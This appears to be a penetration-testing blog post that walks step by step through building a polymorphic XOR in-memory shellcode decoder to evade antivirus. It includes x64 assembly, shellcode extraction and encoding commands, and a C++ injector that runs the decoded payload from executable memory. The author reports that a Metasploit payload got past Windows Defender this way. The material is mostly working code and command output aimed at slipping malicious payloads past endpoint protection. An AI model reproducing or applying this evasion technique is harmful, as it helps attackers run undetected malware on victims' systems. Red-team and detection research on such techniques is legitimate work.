{{tag>IT-Security Windows Kali pentest obfuscation blog english}}
====== Obfuscation: polymorphic in-memory decoder ======
{{it-security:blog:2024-250_xor_in-memory_decoder.webp?400|}}
Red-teaming and penetration tests often require virus scanners to be bypassed in order to effectively detect security vulnerabilities. [[en:it-security:blog:obfuscation_shellcode_als_uuids_tarnen|In the last part]] we looked at disguising shellcode as a UUID in the source code. This also worked well, but the shellcode was recognised in memory and blocked.
We now want to solve this with a polymorphic in-memory decoder: A shellcode that decodes shellcode.
===== XOR decoder =====
I have taken the XOR decoder from [[https://www.doyler.net/security-not-included/shellcode-xor-encoder-decoder|doyler.net]] and adapted it to the x64 architecture. This was quite simple, as only the corresponding registers had to be renamed. The decoder starts with this instruction:
_start:
jmp short call_decoder ; Begin of JMP-CALL-POP
''%%JMP-CALL-POP%%'' is a technique that allows us to execute code independently of memory. In this first step, we now jump to the jump label ''%%call_decoder%%''
call_decoder:
call decoder ; RSP points to the next instruction (the shellcode)
; The encoded shellcode
Shellcode: db 0x6a,0x77,0xb6...
Here we see that the ''%%CALL%%''-instruction directly calls another part of the programme. As soon as this happens, the register ''%%RSP%%'' saves the pointer to the next command (in our case the shellcode) on the stack.
decoder:
pop rsi ; Move pointer to encoded shellcode into RSI from the stack
In the called part of the programme, we save the pointer from the stack to the register ''%%RSI%%'' and know where to address our shellcode in memory.
Now we move on to the actual decryption routine:
decode:
xor byte [rsi], 0x3F ; The byte RSI points to, will be XORed by 0x3F
jz Shellcode ; jump out of the loop if 0: RSI xor 0x3F = 0
inc rsi ; increment RSI to decode the next byte
jmp short decode ; loop until each byte was decoded
''%%xor byte [rsi], 0x3F%%'' now decodes the byte represented by ''%%RSI%%'' is addressed. In this case, this is the first byte of the shellcode. The key for decoding is ''%%0x3F%%'' and can be changed according to the original coding.
''%%jz Shellcode%%'' now checks whether the decoded byte ''%%0x00%%'' corresponds.
==== $Byte \neq 0$ ====
If the result is negative, the code jumps to the next instruction: ''%%inc rsi%%''
''%%RSI%%'' is incremented and thus points to the next byte in the shellcode, which is decoded during the next run. ''%%jmp short decode%%'' jumps back to the beginning of the function.
==== $Byte = 0$ ====
If the result is positive, the loop is interrupted and the shellcode is executed. It is important to append the key to the shellcode here, because:
''%%0x3F XOR 0x3F = 0x00%%''
This marks the end of the shellcode and interrupts the loop. We therefore do not need an additional counter.
''%%jz shellcode%%'' now jumps directly to our decoded shellcode and executes it.
===== calc.exe Payload =====
We want to execute the ''%%calc.exe%%'' payload from [[en:it-security:blog:shellcode_injection-4|from this blog post]]. However, this still contains 0 bytes, which prevent decoding. Why is this the case? Here is an example:
# Encoding
XOR Key: 0x3F
Byte: 0x00
0x00 XOR 0x3F = 0x3F
# Decoding
XOR Key: 0x3F
Byte: 0x3F
0x3F XOR 0x3F = 0x00
A 0-byte would thus abort the encoding process early, since ''%%jz shellcode%%'' would regard this as a signal to terminate. We therefore need to make a few modifications.
==== GS Register ====
The fix for the GS register from the previous post only removes $2/3$ 0 bytes. This was sufficient for the previous tests. A small change brings us to our goal here:
xor rax, rax
mov al, 60h
mov rax, gs:[rax] ; 65 48 8b 00
change to:
xor rax, rax
mov rax, gs:[rax+0x60] ; 65 48 8b 40 60
This also reduces the size of our shellcode a little.
==== Kernel32-Base ====
When searching for ''%%Kernel32Base%%'' we only use the register ''%%RAX%%'' without calculation. This also results in a 0 byte. Here, however, we can use the register ''%%RBX%%'' register and thus avoid the 0 bytes.
mov rax, [rax] ; 48 8b 00
mov rax, [rax] ; 48 8b 00
change to:
mov rbx, [rax] ; 48 8b 18
mov rax, [rbx] ; 48 8b 03
==== JMP SHORT ====
jmp short InvokeWinExec ; eb 00
Here the code jumps to the next instruction. As the code also does this without ''%%JMP%%'' we can comment out the line.
==== Compile ====
We can compile the code and get a clean op-code.
nasm -f win64 calc.asm -o calc.o
===== XOR decoder stub =====
==== Prepare calc.exe payload ====
We now need to edit the op-code a little in order to be able to use it in the decoder. I use my ShellCode tool for this [[https://github.com/psycore8/shencode|ShenCode]]:
python shencode.py extract -i calc.o -o calc.raw -fb 60 -lb 311
...
python shencode.py xorencode -i calc.raw -o calc.xor -k 63
...
python shencode.py formatout -i calc.xor -s cs
[*] processing shellcode format...
0x6a,0x77,0xb6,
...
0x07,0x77,0xbc,0xfb,0x27,0x77,0xbc,0xfb,0x37,0x62
[+] DONE!
Step by step:
- We extract the actual shellcode from the file ''%%calc.o%%'' and save it in ''%%calc.raw%%'' (from offset ''%%60%%'' to ''%%311%%'')
- We encode the extracted code with the key ''%%63%%'' and save the result in ''%%calc.xor%%'', ''%%63%%'' decimal corresponds to ''%%3F%%'' Hexadecimal
- We output the encoded shellcode in C# format (which we can also use for assembler)
We save the output, remove the line breaks and append our "magic byte" ''%%0x3F%%'' at the end.
==== XOR decoder and payload ====
Now we can add our payload to the XOR decoder. To do this, we copy the previously prepared code into the last instruction of the XOR decoder:
; The encoded shellcode
Shellcode: db 0x6a,0x77,0xb6,...0x37,0x62,0x3f
We also check whether the XOR key matches:
decode:
xor byte [rsi], 0x3F
If everything is correct, we compile our decoder:
nasm -f win64 xor-decoder.asm -o xor-decoder.o
We then search for the shellcode offsets, extract our code and prepare it for our ''%%Inject.cpp%%'' file:
python shencode.py formatout -i xor-decoder.o -s inspect
0x00000048: 00 00 00 00 00 00 00 00
0x00000056: 20 00 50 60 eb 0b 5e 80 Offset=60
0x00000064: 36 3f 74 0a 48 ff c6 eb
...
0x00000320: bc fb 27 77 bc fb 37 62
0x00000328: 3f 2e 66 69 6c 65 00 00 Offset=329
0x00000336: 00 00 00 00 00 fe ff 00
python shencode.py extract -i xor-decoder.o -o xor-decoder.stub -fb 60 -lb 329
[*] try to open file
[+] reading xor-decoder.o successful!
[*] cutting shellcode from 60 to 329
[+] written shellcode to xor-decoder.stub
[+] DONE!
python shencode.py formatout -i xor-decoder.stub -s c
[*] processing shellcode format...
"\xeb\x0b\x5e...\x37\x62\x3f"";
[+] DONE!
===== Inject.cpp =====
We can now insert the bytes we have just prepared into our injector programme and compile it.
#include
#include
#include
#pragma warning
unsigned char payload[] =
"\xeb\x0b\x5e...\x37\x62\x3f";
int main() {
size_t byteArrayLength = sizeof(payload);
std::cout << "[x] Payload size: " << byteArrayLength << " bytes" << std::endl;
void* (*memcpyPtr) (void*, const void*, size_t);
void* exec = VirtualAlloc(0, byteArrayLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpyPtr = &memcpy;
memcpyPtr(exec, payload, byteArrayLength);
((void(*)())exec)();
return 0;
}
===== Debug =====
For testing purposes, I have started a debugger and am now navigating to the memory area of the XOR decoder. During the debug, you can see step-by-step how the instructions in the lower area are decoded. This can be seen in the images below the ''%%call%%'' statement (which is ''%%Shellcode: db ...%%'' corresponds to).
{{it-security:blog:2024-250_xor_in-memory_decoder.png?600|}}
{{it-security:blog:2024-250_xor_in-memory_decoder_1.png?600|}}
{{it-security:blog:2024-250_xor_in-memory_decoder_2.png?600|}}
{{it-security:blog:2024-250-animation.gif|}}
The animation above shows the decoding loop, while the shellcode in the lower area is decoded step by step.
===== Test with a Metasploit payload =====
The whole thing also works with a Metasploit payload:
{{it-security:blog:2024-250_xor_in-memory_decoder_3.png?700|}}
===== Conclusion =====
To simplify the process, I have integrated the XOR stub as a template in [[https://github.com/psycore8/shencode|ShenCode]] as a template. With two commands, we generate an XOR in-memory decoder:
python shencode.py xorencode -i input.raw -o xor.out --key 63
python shencode.py xorpoly -i xor.out -o stub.raw --key 63
The XOR decoder provides effective memory protection. In combination with other obfuscation techniques, this can be a good helper for penetration tests. During my test, even the Metasploit payload was not detected by Windows Defender.
~~DISCUSSION~~